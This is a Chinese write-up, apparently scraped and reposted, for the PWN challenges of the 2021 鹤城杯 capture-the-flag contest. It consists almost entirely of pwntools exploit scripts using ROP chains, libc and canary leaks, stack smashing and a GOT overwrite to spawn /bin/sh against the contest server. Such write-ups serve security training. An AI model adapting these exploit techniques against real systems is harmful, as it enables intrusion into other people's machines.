2021-鹤城杯wp-PWN

onecho

控memcpy参数,把ROP链读到bss段,ROP链构造orw,注意清栈

from pwn import * from pwn import p64, u64, p32, u32, p8 context.arch = 'i386' context.log_level = 'debug' context.terminal = ['tmux', 'sp', '-h'] elf = ELF('./onecho') # libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so') # libc = ELF('/usr/lib/i386-linux-gnu/libc-2.31.so') libc = ELF('./libc.so.6') # io = process('./onecho') io = remote('182.116.62.85','24143') putsPLT = elf.plt['puts'] putsGOT = elf.got['puts'] main = 0x0804973F bss = 0x0804C008+0x500 pebx = 0x08049022 # : pop ebx ; ret pedi =0x08049812 #: pop edi ; pop ebp ; ret pppr = 0x08049811 #: pop esi ; pop edi ; pop ebp ; ret def exp(): io.recvuntil('name:') chain = p32(putsPLT) + p32(main) + p32(putsGOT) payload = chain.ljust(0x110,b'a')+p32(pedi)+p32(bss)+p32(0x10)+p32(putsPLT)+p32(main)+p32(putsGOT) io.sendline(payload) io.recvuntil('[?] Error?\n') leak = u32(io.recv(4)) info(hex(leak)) libc_base = leak - libc.sym['puts'] o = libc_base+libc.sym['open'] r = libc_base + libc.sym['read'] w = libc_base + libc.sym['write'] fwrite = libc_base + libc.sym['fwrite'] fread = libc_base + libc.sym['fread'] info(hex(libc_base)) info(hex(o)) info(hex(r)) info(hex(w)) chain = b'flag\x00' payload = chain.ljust(0x110,b'a')+p32(pedi)+p32(bss)+p32(0x10) payload += p32(o)+p32(pedi)+p32(bss) +p32(0) payload += p32(r)+p32(pppr)+p32(3)+p32(bss+0x100)+p32(0x70) payload += p32(w)+p32(main)+p32(1)+p32(bss+0x100)+p32(0x70) # gdb.attach(io) io.sendline(payload) exp() io.interactive() 

babyof

from pwn import * from pwn import p64,u64,p32,u32,p8 context.arch = 'amd64' context.log_level = 'debug' context.terminal = ['tmux','sp','-h'] elf = ELF('./babyof') # libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so') libc = ELF('./libc-2.27.so') # io = process('./babyof') io = remote('182.116.62.85','21613') prdi = 0x0000000000400743#: pop rdi prsi = 0x0000000000400741 #: pop rsi ; pop r15 ; ret prdx = 0x0000000000001b96 #: pop rdx ; ret def exp(): # io.recvuntil('Do you know how to do buffer overflow?') payload = b'a'*0x48 + p64(prdi) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(0x40066B) io.send(payload) leak = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) info(hex(leak)) libc_base = leak - libc.sym['puts'] system = libc_base + libc.sym['system'] info(hex(system)) binsh = libc_base + next(libc.search(b'/bin/sh\x00')) pop_rdx = libc_base + prdx # io.recvuntil('Do you know how to do buffer overflow?') payload = b'a'*0x48 +p64(pop_rdx)+p64(0)+p64(prsi)+p64(0)*2 +p64(prdi) + p64(binsh) + p64(system) # gdb.attach(io) io.send(payload) exp() io.interactive() 

easycho

输入backdoor把flag读到内存,利用stack smash打印flag

from pwn import * from pwn import p64, u64, p32, u32, p8 context.arch = 'amd64' context.log_level = 'debug' context.terminal = ['tmux', 'sp', '-h'] # elf = ELF('./easyecho') # libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so') # libc = ELF('') # io = process('./easyecho') io = remote('182.116.62.85', '24842') def exp(): io.recvuntil('Name:') io.sendline('a'*0x10) io.recvuntil('a'*0x10) leak = u64(io.recv(6).ljust(8, b'\x00')) elf_base = leak - 0xcf0 flag_addr = elf_base + 0x202040 info(hex(elf_base)) info(hex(flag_addr)) io.sendlineafter('Input:', 'backdoor') io.recvuntil('Input:') # gdb.attach(io) io.sendline(cyclic(0x88+0xe0)+p64(flag_addr)) io.sendlineafter('Input:', 'exitexit') exp() io.interactive() 

PWN 1

原题supermarket,网上抄的exp直接可以打通

#coding:utf-8 from pwn import * from pwn import u32,p32 context.log_level = 'debug' debug = 0 if debug == 1: r = process('./supermarket') # gdb.attach(r) else: # r = remote('111.198.29.45', 56608) r = remote('182.116.62.85','27518') def add(name, price, descrip_size, description): r.recvuntil('your choice>> ') r.send('1\n') r.recvuntil('name:') r.send(name + '\n') r.recvuntil('price:') r.send(str(price) + '\n') r.recvuntil('descrip_size:') r.send(str(descrip_size) + '\n') r.recvuntil('description:') r.send(str(description) + '\n') def dele(name): r.recvuntil('your choice>> ') r.send('2\n') r.recvuntil('name:') r.send(name + '\n') def lis(): r.recvuntil('your choice>> ') r.send('3\n') r.recvuntil('all commodities info list below:\n') return r.recvuntil('\n---------menu---------')[:-len('\n---------menu---------')] def changePrice(name, price): r.recvuntil('your choice>> ') r.send('4\n') r.recvuntil('name:') r.send(name + '\n') r.recvuntil('input the value you want to cut or rise in:') r.send(str(price) + '\n') def changeDes(name, descrip_size, description): r.recvuntil('your choice>> ') r.send('5\n') r.recvuntil('name:') r.send(name + '\n') r.recvuntil('descrip_size:') r.send(str(descrip_size) + '\n') r.recvuntil('description:') r.send(description + b'\n') def exit(): r.recvuntil('your choice>> ') r.send('6\n') add('1', 10, 8, 'a') add('2', 10, 0x98, 'a') add('3', 10, 4, 'a') changeDes('2', 0x100, b'a') add('4', 10, 4, 'a') def leak_one(address): changeDes('2', 0x98, b'4' + b'\x00' * 0xf + p32(2) + p32(0x8) + p32(address)) res = str(lis().decode('ISO-8859-1')).split('des.')[-1] if(res == '\n'): return '\x00' return res[0] def leak(address): content = leak_one(address) + leak_one(address + 1) + leak_one(address + 2) + leak_one(address + 3) log.info('%#x => %#x' % (address, u32(content))) return content.encode('ISO-8859-1') d = DynELF(leak, elf=ELF('./task_supermarket')) system_addr = d.lookup('system', 'libc') log.info('system \'s address = %#x' % (system_addr)) bin_addr = 0x0804B0B8 changeDes('1', 0x8, b'/bin/sh\x00') changeDes('2', 0x98, b'4' + b'\x00' * 0xf + p32(2) + p32(0x8) + p32(0x0804B018)) changeDes('4', 8, p32(system_addr)) dele('1') r.interactive() 

littleof

from pwn import * from pwn import p64,u64,p32,u32,p8 context.arch = 'amd64' context.log_level = 'debug' context.terminal = ['tmux','sp','-h'] elf = ELF('./littleof') # libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so') # libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so') libc = ELF('./libc-2.27.so') # io = process('./littleof') io = remote('182.116.62.85','27056') prdi = 0x0000000000400863#: pop rdi; ret; prsi = 0x0000000000400861#: pop rsi; pop r15; ret; prdx = 0x0000000000001b96 #: pop rdx ; ret putsPLT = elf.plt['puts'] putsGOT = elf.got['puts'] main = 0x0000000000400789 def exp(): io.recvuntil('Do you know how to do buffer overflow?') payload = 'a'*(57+16) io.send(payload) io.recvuntil('a'*(57+16)) canary = u64(io.recv(7).rjust(8,b'\x00')) info(hex(canary)) payload = b'a'*0x48+p64(canary)*2+p64(prdi) + p64(putsGOT) + p64(putsPLT)+p64(main) io.sendlineafter('Try harder!',payload) leak = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) info(hex(leak)) libc_base = leak - libc.sym['puts'] system = libc_base + libc.sym['system'] binsh = libc_base + next(libc.search(b'/bin/sh\x00')) info(hex(libc_base)) info(hex(system)) info(hex(binsh)) io.recvuntil('Do you know how to do buffer overflow?') io.sendline('A'*8) rdx = libc_base + prdx payload = b'a'*0x48+p64(canary)+p64(prdi)*2 + p64(binsh)+p64(rdx)+p64(0)+p64(prsi)+p64(0)*2 + p64(system)+p64(main) # gdb.attach(io) io.sendlineafter('Try harder!',payload) exp() io.interactive() 

总结

题目比较水,也算是ak了

本网页由快兔兔AI采集器生成,目的为演示采集效果,若侵权请及时联系删除。

原文链接:https://www.cnblogs.com/unr4v31/p/15404671.html

更多内容